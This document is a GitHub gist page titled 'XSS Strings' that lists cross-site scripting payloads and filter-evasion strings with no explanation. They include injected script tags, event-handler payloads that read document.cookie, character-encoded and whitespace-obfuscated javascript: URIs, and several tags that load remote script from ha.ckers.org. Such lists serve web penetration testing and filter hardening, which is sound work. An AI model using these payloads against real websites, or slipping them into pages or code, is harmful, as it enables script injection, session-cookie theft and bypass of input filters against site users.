Skip to content

Instantly share code, notes, and snippets.

@funkaoshi

funkaoshi/XSS Strings

Created February 19, 2014 01:46
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save funkaoshi/9084603 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save funkaoshi/9084603 to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. funkaoshi created this gist Feb 19, 2014.
    94 changes: 94 additions & 0 deletions XSS Strings
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,94 @@
    ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
    alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
    ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

    '';!--"<XSS>=&{()}

    <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

    <IMG SRC="javascript:alert('XSS');">

    <IMG SRC=javascript:alert('XSS')>

    <IMG SRC=JaVaScRiPt:alert('XSS')>

    <IMG SRC=javascript:alert("XSS")>

    <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

    <a onmouseover="alert(document.cookie)">xxs link</a>

    <a onmouseover=alert(document.cookie)>xxs link</a>

    <IMG """><SCRIPT>alert("XSS")</SCRIPT>">

    <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

    <IMG SRC=# onmouseover="alert('xxs')">

    <IMG SRC= onmouseover="alert('xxs')">

    <IMG onmouseover="alert('xxs')">

    <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

    <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
    &#39;&#88;&#83;&#83;&#39;&#41;>

    <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
    #0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

    <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

    <IMG SRC="jav ascript:alert('XSS');">

    <IMG SRC="jav&#x09;ascript:alert('XSS');">

    <IMG SRC="jav&#x0A;ascript:alert('XSS');">

    <IMG SRC="jav&#x0D;ascript:alert('XSS');">

    <IMG SRC=" &#14; javascript:alert('XSS');">

    <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

    <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

    <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

    <<SCRIPT>alert("XSS");//<</SCRIPT>

    <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >

    <SCRIPT SRC=//ha.ckers.org/.j>

    <IMG SRC="javascript:alert('XSS')"

    <iframe src=http://ha.ckers.org/scriptlet.html <

    \";alert('XSS');//



    </TITLE><SCRIPT>alert("XSS");</SCRIPT>


    <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">


    <BODY BACKGROUND="javascript:alert('XSS')">


    <IMG DYNSRC="javascript:alert('XSS')">


    <IMG LOWSRC="javascript:alert('XSS')">

    <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

    <IMG SRC='vbscript:msgbox("XSS")'>


    <IMG SRC="livescript:[code]">

    <BODY ONLOAD=alert('XSS')>